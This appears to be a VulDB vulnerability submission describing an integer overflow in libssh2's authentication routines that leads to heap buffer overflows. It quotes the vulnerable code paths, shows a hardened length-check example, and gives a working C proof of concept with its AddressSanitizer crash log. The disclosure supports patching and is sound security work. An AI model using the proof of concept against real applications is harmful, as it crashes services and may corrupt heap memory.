| Title | libssh2 <= 1.11.1 Integer Overflow |
|---|---|
| Description | ### Summary
An integer overflow vulnerability in the libssh2 project's user authentication routines leads to heap buffer overflows.
By supplying excessively large length values (e.g., `username_len`), an attacker can trigger integer wraparound during buffer size calculations, resulting in undersized heap allocations followed by oversized memory copies.
This issue leads to reliable process crashes (Denial of Service) and may enable heap corruption with potential for advanced exploitation under specific conditions.
---
### Details
Multiple code paths in `src/userauth.c` perform unchecked integer arithmetic when calculating buffer sizes for authentication packets:
#### Vulnerable patterns
Path A — `libssh2_userauth_list`:
```c
session->userauth_list_data_len = username_len + 27;
s = session->userauth_list_data = LIBSSH2_ALLOC(session, session->userauth_list_data_len);
*(s++) = SSH_MSG_USERAUTH_REQUEST;
_libssh2_store_str(&s, username, username_len);
```
Path B — `libssh2_userauth_password_ex`:
```c
session->userauth_pswd_data_len = username_len + 40;
s = session->userauth_pswd_data = LIBSSH2_ALLOC(session, session->userauth_pswd_data_len);
*(s++) = SSH_MSG_USERAUTH_REQUEST;
_libssh2_store_str(&s, username, username_len);
```
Path C — password change callback:
```c
if(username_len + password_len + 44 <= UINT_MAX) {
    session->userauth_pswd_data_len = username_len + password_len + 44;
    s = session->userauth_pswd_data = LIBSSH2_ALLOC(session, session->userauth_pswd_data_len);
}
*(s++) = SSH_MSG_USERAUTH_REQUEST;
_libssh2_store_str(&s, username, username_len);
```
Root cause:
- Arithmetic such as `username_len + constant` is performed using unsigned integers without overflow checks.
- If `username_len` is close to `UINT_MAX`, the addition wraps around to a small value.
- `LIBSSH2_ALLOC` then allocates a much smaller buffer than intended.
- `_libssh2_store_str` performs a `memcpy` of `username_len` bytes into this undersized buffer.
This results in a heap buffer overflow.
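The wraparound behind Paths A to C, and the overflow-safe length check a fix needs, as an added stand-alone example (not libssh2 code; the helper names `unchecked_packet_len`, `checked_packet_len`, `checked_packet_len2` and `path_c_guard` are hypothetical):

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical helpers added for illustration; none of this is libssh2 code.
 * unchecked_packet_len() mirrors the arithmetic of Paths A/B: with
 * username_len = 0xFFFFFFE9 the sum 0xFFFFFFE9 + 27 wraps to 4, which is
 * exactly the 4-byte region ASan reports in the PoC below. */
unsigned int unchecked_packet_len(unsigned int username_len, unsigned int extra)
{
    return username_len + extra;        /* silent modular wraparound */
}

/* Hardened form: compare against (UINT_MAX - extra) before adding so the
 * check itself cannot overflow; refuse the request instead of allocating. */
bool checked_packet_len(unsigned int username_len, unsigned int extra,
                        unsigned int *out)
{
    if(username_len > UINT_MAX - extra)
        return false;                    /* caller must reject the input */
    *out = username_len + extra;
    return true;
}

/* Path C shape: two untrusted lengths plus a constant. Each addition is
 * checked separately; a single combined sum would already have wrapped. */
bool checked_packet_len2(unsigned int username_len, unsigned int password_len,
                         unsigned int extra, unsigned int *out)
{
    unsigned int partial;
    if(!checked_packet_len(username_len, extra, &partial))
        return false;
    return checked_packet_len(partial, password_len, out);
}

/* Why the guard in Path C never fires: the sum is evaluated in unsigned int,
 * so the (possibly wrapped) result is always <= UINT_MAX. */
bool path_c_guard(unsigned int username_len, unsigned int password_len)
{
    unsigned int total = username_len + password_len + 44;
    return total <= UINT_MAX;
}

int main(void)
{
    unsigned int out = 0;
    printf("unchecked: %u\n", unchecked_packet_len(0xFFFFFFE9u, 27u));
    printf("checked: %s\n", checked_packet_len(0xFFFFFFE9u, 27u, &out) ? "ok" : "rejected");
    return 0;
}
```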
---
### PoC
Compile:
```sh
gcc -fsanitize=address -g poc.c -o poc -lssh2
```
Code:
```c
#include <libssh2.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

int main(void)
{
    LIBSSH2_SESSION *session = libssh2_session_init();
    /* Length chosen so that username_len + 27 wraps to 4 in unsigned int */
    unsigned int ulen = 0xFFFFFFE9;
    char *big = malloc(ulen);
    if(!session || !big)
        return 1;
    memset(big, 'A', ulen);
    /* Undersized allocation followed by an oversized memcpy of ulen bytes */
    libssh2_userauth_list(session, big, ulen);
    return 0;
}
```
Expected result:
AddressSanitizer reports a heap-buffer-overflow inside libssh2.
```
=================================================================
==13815==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ba7575e0015 at pc 0x7f8758d21c84 bp 0x7ffe40b60b50 sp 0x7ffe40b60310
WRITE of size 4294967273 at 0x7ba7575e0015 thread T0
#0 0x7f8758d21c83 in memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:117
#1 0x7f87593e58d2 (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x208d2) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23)
#2 0x7f87593f7e0b in libssh2_userauth_list (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x32e0b) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23)
#3 0x564e648461ed in main (/home/kali/Documents/libssh2/poc+0x11ed) (BuildId: 78ebde58466f41946dc9f7d2d7424b91a1553a08)
#4 0x7f8758a33f74 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#5 0x7f8758a34026 in __libc_start_main_impl ../csu/libc-start.c:360
#6 0x564e648460c0 in _start (/home/kali/Documents/libssh2/poc+0x10c0) (BuildId: 78ebde58466f41946dc9f7d2d7424b91a1553a08)
0x7ba7575e0015 is located 1 bytes after 4-byte region [0x7ba7575e0010,0x7ba7575e0014)
allocated by thread T0 here:
#0 0x7f8758d2431f in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:67
#1 0x7f87593f7ddb in libssh2_userauth_list (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x32ddb) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libssh2.so.1+0x208d2) (BuildId: 3d68ae994d38b39f7f4b2f45bc30938105db4d23)
Shadow bytes around the buggy address:
0x7ba7575dfd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ba7575dfe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ba7575dfe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ba7575dff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ba7575dff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x7ba7575e0000: fa fa[04]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ba7575e0080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ba7575e0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ba7575e0180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ba7575e0200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ba7575e0280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==13815==ABORTING
```
---
### Impact
Type:
- Integer overflow (CWE-190)
- Heap buffer overflow (CWE-122)
Impact:
- Reliable Denial of Service (crash)
- Heap corruption
- Potential for exploitation in specific environments
Affected:
- Applications that pass user-controlled input to libssh2 authentication APIs
- Examples include:
  - SSH gateways
  - automation platforms
  - CI/CD systems
  - file transfer tools using libssh2
Exploitability:
- Modern allocators (glibc, jemalloc): typically result in crash due to integrity checks
- Older or custom allocators: may allow controlled heap corruption
- No direct information leak primitive observed
- RCE not demonstrated, but cannot be ruled out in constrained scenarios
|
| Source | https://github.com/libssh2/libssh2/pull/1858 |
| User | dapickle (UID 97309) |
| Submission | 15.04.2026 08:51 (2 months ago) |
| Moderation | 01.05.2026 12:45 (16 days later) |
| Status | Accepted |
| VulDB Entry | 360555 [libssh2 up to 1.11.1 src/userauth.c userauth_password username_len/password_len buffer overflow] |
| Points | 20 |